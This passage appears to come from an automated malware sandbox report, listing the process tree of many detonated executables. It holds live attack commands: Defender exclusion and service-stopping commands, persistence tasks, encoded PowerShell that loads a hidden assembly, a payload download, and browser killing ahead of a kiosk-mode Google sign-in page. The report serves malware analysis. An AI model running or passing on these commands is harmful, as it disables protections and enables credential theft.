  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3016
- - C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
    "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4460
- C:\Users\Admin\Desktop\Files\yxrd0ob7.exe
  "C:\Users\Admin\Desktop\Files\yxrd0ob7.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4464
- - C:\Users\Admin\Desktop\Files\yxrd0ob7.exe
    "C:\Users\Admin\Desktop\Files\yxrd0ob7.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2208
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 268
    3⤵
    - Program crash
    PID:276
- C:\Users\Admin\Desktop\Files\twztl.exe
  "C:\Users\Admin\Desktop\Files\twztl.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5092
- - C:\Windows\sysppvrdnvs.exe
    C:\Windows\sysppvrdnvs.exe
    3⤵
    - Modifies security service
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - System Location Discovery: System Language Discovery
    PID:1800
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      System Location Discovery: System Language Discovery
      PID:804
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:3532
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
      4⤵
      System Location Discovery: System Language Discovery
      PID:3488
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4532
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4608
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5024
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2424
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3520
  - - C:\Users\Admin\AppData\Local\Temp\2496614166.exe
      C:\Users\Admin\AppData\Local\Temp\2496614166.exe
      4⤵
      PID:7880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        5⤵
        
        PID:7324
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:7848
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        5⤵
        
        PID:8112
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:8068
  - - C:\Users\Admin\AppData\Local\Temp\317888699.exe
      C:\Users\Admin\AppData\Local\Temp\317888699.exe
      4⤵
      PID:6364
  - - C:\Users\Admin\AppData\Local\Temp\222772718.exe
      C:\Users\Admin\AppData\Local\Temp\222772718.exe
      4⤵
      PID:4640
  - - C:\Users\Admin\AppData\Local\Temp\145888575.exe
      C:\Users\Admin\AppData\Local\Temp\145888575.exe
      4⤵
      PID:9320
- C:\Users\Admin\Desktop\Files\install2.exe
  "C:\Users\Admin\Desktop\Files\install2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1128
- - C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe
    "C:\Users\Admin\Desktop\Files\install2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:4152
  - - C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe" "--multiprocessing-fork" "parent_pid=4152" "pipe_handle=412"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:436
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im chrome.exe"
        5⤵
        
        PID:1976
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:5248
  - - C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe" "--multiprocessing-fork" "parent_pid=4152" "pipe_handle=416"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:3400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im brave.exe"
        5⤵
        
        PID:580
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im brave.exe
        6⤵
        Kills process with taskkill
        
        PID:5232
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im vivaldi.exe"
        5⤵
        
        PID:5504
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im vivaldi.exe
        6⤵
        Kills process with taskkill
        
        PID:5728
  - - C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe" "--multiprocessing-fork" "parent_pid=4152" "pipe_handle=484"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:1332
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im msedge.exe"
        5⤵
        
        PID:2588
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im msedge.exe
        6⤵
        Kills process with taskkill
        
        PID:5240
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im browser.exe"
        5⤵
        
        PID:5512
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im browser.exe
        6⤵
        Kills process with taskkill
        
        PID:5740
  - - C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe" "--multiprocessing-fork" "parent_pid=4152" "pipe_handle=520"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:3088
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im opera.exe"
        5⤵
        
        PID:3636
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im opera.exe
        6⤵
        Kills process with taskkill
        
        PID:5256
  - - C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_1128_133762566494275244\test.exe" "--multiprocessing-fork" "parent_pid=4152" "pipe_handle=552"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:2564
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im opera.exe"
        5⤵
        
        PID:3592
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im opera.exe
        6⤵
        Kills process with taskkill
        
        PID:5344
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:5620
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:5776
- C:\Users\Admin\Desktop\Files\2.exe
  "C:\Users\Admin\Desktop\Files\2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2264
- - C:\Windows\sysklnorbcv.exe
    C:\Windows\sysklnorbcv.exe
    3⤵
    PID:5492
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      PID:5228
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5300
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
      4⤵
      PID:4524
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:5652
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:5632
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:5556
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        5⤵
        Launches sc.exe
        
        PID:5164
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        5⤵
        Launches sc.exe
        
        PID:5820
  - - C:\Users\Admin\AppData\Local\Temp\412312769.exe
      C:\Users\Admin\AppData\Local\Temp\412312769.exe
      4⤵
      PID:4816
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        5⤵
        
        PID:2588
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:6960
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        5⤵
        
        PID:5200
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:2132
  - - C:\Users\Admin\AppData\Local\Temp\31249290.exe
      C:\Users\Admin\AppData\Local\Temp\31249290.exe
      4⤵
      PID:6944
  - - C:\Users\Admin\AppData\Local\Temp\317762594.exe
      C:\Users\Admin\AppData\Local\Temp\317762594.exe
      4⤵
      PID:5732
  - - C:\Users\Admin\AppData\Local\Temp\230191512.exe
      C:\Users\Admin\AppData\Local\Temp\230191512.exe
      4⤵
      PID:4596
- C:\Users\Admin\Desktop\Files\client.exe
  "C:\Users\Admin\Desktop\Files\client.exe"
  2⤵
  PID:4032
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "hyperhostvc" /tr '"C:\Users\Admin\AppData\Roaming\hyperhostvc.exe"' & exit
    3⤵
    PID:5792
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "hyperhostvc" /tr '"C:\Users\Admin\AppData\Roaming\hyperhostvc.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE72E.tmp.bat""
    3⤵
    PID:5808
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5152
  - - C:\Users\Admin\AppData\Roaming\hyperhostvc.exe
      "C:\Users\Admin\AppData\Roaming\hyperhostvc.exe"
      4⤵
      PID:5684
- C:\Users\Admin\Desktop\Files\peinf.exe
  "C:\Users\Admin\Desktop\Files\peinf.exe"
  2⤵
  PID:5212
- C:\Users\Admin\Desktop\Files\svchost.exe
  "C:\Users\Admin\Desktop\Files\svchost.exe"
  2⤵
  PID:5660
- C:\Users\Admin\Desktop\Files\XClient.exe
  "C:\Users\Admin\Desktop\Files\XClient.exe"
  2⤵
  PID:5860
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1976
- C:\Users\Admin\Desktop\Files\OneDrive.exe
  "C:\Users\Admin\Desktop\Files\OneDrive.exe"
  2⤵
  PID:5236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAZABvAGMAdQBtAGUAbgB0AHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA=
    3⤵
    PID:3728
- - C:\Users\Admin\AppData\Local\Temp\utejko.exe
    "C:\Users\Admin\AppData\Local\Temp\utejko.exe"
    3⤵
    PID:3680
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7468
- - C:\Users\Admin\AppData\Local\Temp\auiibo.exe
    "C:\Users\Admin\AppData\Local\Temp\auiibo.exe"
    3⤵
    PID:7516
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs"
      4⤵
      PID:7384
    - - C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" -enc JABLAHgAcAByAGsAdABqAG8AbwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABOAHkAdgBoAHkAeAB2AGsAaQAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEsAeABwAHIAawB0AGoAbwBvACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEwAZQBwAGsAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABOAHkAdgBoAHkAeAB2AGsAaQAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQARABmAGEAdwBuAG8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEwAZQBwAGsAbAAgACkAOwAkAEMAYwB5AGMAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABEAGYAYQB3AG4AbwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAuAEMAbwBwAHkAVABvACgAIAAkAEMAYwB5AGMAaQAgACkAOwAkAE4AbABhAHMAegBhAHEAaABkAHEALgBDAGwAbwBzAGUAKAApADsAJABEAGYAYQB3AG4AbwAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEwAZQBwAGsAbAAgAD0AIAAkAEMAYwB5AGMAaQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATABlAHAAawBsACkAOwAgACQARABqAGkAaABjAGMAaABtAHoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABMAGUAcABrAGwAKQA7ACAAJABKAG4AegBhAHgAagAgAD0AIAAkAEQAagBpAGgAYwBjAGgAbQB6AC4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7ACAAWwBTAHkAcwB0AGUAbQAuAEQAZQBsAGUAZwBhAHQAZQBdADoAOgBDAHIAZQBhAHQAZQBEAGUAbABlAGcAYQB0AGUAKABbAEEAYwB0AGkAbwBuAF0ALAAgACQASgBuAHoAYQB4AGoALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEoAbgB6AGEAeABqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
        5⤵
        
        PID:6028
  - - C:\Users\Admin\AppData\Local\Temp\OneDrive.exe
      "C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"
      4⤵
      PID:7888
- C:\Users\Admin\Desktop\Files\cmaclient.exe
  "C:\Users\Admin\Desktop\Files\cmaclient.exe"
  2⤵
  PID:5716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:excellent2024/:stars_1/stars" -OutFile "C:\Users\Public\Guard.exe""
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3532
  - - C:\Users\Public\Guard.exe
      "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
      4⤵
      PID:3452
    - - C:\Users\Admin\AppData\Local\Temp\5DE5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5DE5.exe"
        5⤵
        
        PID:668
      - C:\Users\Admin\AppData\Local\Temp\2750430006.exe
        
        C:\Users\Admin\AppData\Local\Temp\2750430006.exe
        6⤵
        
        PID:5744
- C:\Users\Admin\Desktop\Files\PkContent.exe
  "C:\Users\Admin\Desktop\Files\PkContent.exe"
  2⤵
  PID:5712
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
    3⤵
    PID:5572
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5036
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa opssvc"
      4⤵
      PID:6252
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:6496
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
      4⤵
      PID:6508
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 724598
      4⤵
      PID:5728
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "WowLiberalCalOfficer" Weight
      4⤵
      PID:3704
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
      4⤵
      PID:5448
  - - C:\Users\Admin\AppData\Local\Temp\724598\Thermal.pif
      Thermal.pif y
      4⤵
      PID:1656
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      PID:5096
- C:\Users\Admin\Desktop\Files\meta.exe
  "C:\Users\Admin\Desktop\Files\meta.exe"
  2⤵
  PID:2584
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
    3⤵
    PID:4224
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
    3⤵
    PID:4660
- C:\Users\Admin\Desktop\Files\random.exe
  "C:\Users\Admin\Desktop\Files\random.exe"
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM firefox.exe /T
    3⤵
    - Kills process with taskkill
    PID:2432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM chrome.exe /T
    3⤵
    - Kills process with taskkill
    PID:5556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM msedge.exe /T
    3⤵
    - Kills process with taskkill
    PID:4732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM opera.exe /T
    3⤵
    - Kills process with taskkill
    PID:5800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM brave.exe /T
    3⤵
    - Kills process with taskkill
    PID:5644
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
    3⤵
    PID:1996
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:5620
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1936 -parentBuildID 20240401114208 -prefsHandle 1876 -prefMapHandle 1868 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {13c7773e-8146-4862-8c67-2b85551fcc94} 5620 "\\.\pipe\gecko-crash-server-pipe.5620" gpu
        5⤵
        
        PID:3780
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f32c279-c525-4ce9-b420-558b2fc42016} 5620 "\\.\pipe\gecko-crash-server-pipe.5620" socket
        5⤵
        
        PID:3408
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3384 -childID 1 -isForBrowser -prefsHandle 3376 -prefMapHandle 3372 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2ad6523-ca2c-419b-8d25-bbaa0e31f6b0} 5620 "\\.\pipe\gecko-crash-server-pipe.5620" tab
        5⤵
        
        PID:244
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3148 -childID 2 -isForBrowser -prefsHandle 3836 -prefMapHandle 3364 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {58c3d9dd-746b-4ff9-9a82-43dc7f373a1d} 5620 "\\.\pipe\gecko-crash-server-pipe.5620" tab
        5⤵
        
        PID:2432
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4680 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4712 -prefMapHandle 4708 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb999148-2d0e-4dc1-aecf-1535b9405736} 5620 "\\.\pipe\gecko-crash-server-pipe.5620" utility
        5⤵
        
        PID:2448
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5616 -childID 3 -isForBrowser -prefsHandle 5648 -prefMapHandle 4568 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {950c8ccb-8e03-4491-bafd-2a97aee90e56} 5620 "\\.\pipe\gecko-crash-server-pipe.5620" tab
        5⤵
        
        PID:2920
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 4 -isForBrowser -prefsHandle 5788 -prefMapHandle 5792 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8f72ecc-7842-4c27-ad85-f47fb99c79f2} 5620 "\\.\pipe\gecko-crash-server-pipe.5620" tab
        5⤵
        
        PID:5700
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5976 -childID 5 -isForBrowser -prefsHandle 6052 -prefMapHandle 6048 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b10bd8b4-677b-4871-b280-eb719f187a61} 5620 "\\.\pipe\gecko-crash-server-pipe.5620" tab
        5⤵
        
        PID:5564
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4432 -childID 6 -isForBrowser -prefsHandle 5560 -prefMapHandle 4520 -prefsLen 28163 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23cf4352-0147-48b0-9193-9997dee1dfaa} 5620 "\\.\pipe\gecko-crash-server-pipe.5620" tab
        5⤵
        
        PID:3788
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
